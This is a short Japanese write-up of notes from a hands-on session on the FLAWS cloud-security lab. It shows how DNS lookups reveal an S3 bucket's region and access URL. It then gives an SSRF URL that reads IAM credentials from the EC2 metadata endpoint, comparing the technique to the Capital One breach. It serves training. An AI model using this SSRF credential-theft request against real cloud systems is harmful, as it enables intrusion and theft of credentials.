概要
とある診断員とSecurity-JAWS #01に参加した。
とてもよい頭の体操になった。
FLAWSをハンズオン形式で実施した。その際のメモ。
ちなみにflawsのネタばれになる。
S3を公開している場合
名前解決することでリージョンがわかる。
C:\Users\shimizu>nslookup flaws.cloud 権限のない回答: 名前: flaws.cloud Address: 52.218.232.234 C:\Users\shimizu>nslookup 52.218.232.234 名前: s3-website-us-west-2.amazonaws.com Address: 52.218.232.234
S3で公開しているためバケット名はflaws.cloudとなる。つまり以下URLでアクセス可能。
意図せずデータを公開していた場合、すべて漏洩する。
http://flaws.cloud.s3-us-west-2.amazonaws.com/
SSRF(Server Side Request Forgery)攻撃
リバースプロキシ設定が脆弱であれば、内部の情報を取得することが可能になる。
同様の手法でCapital Oneの個人情報が流出している。
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws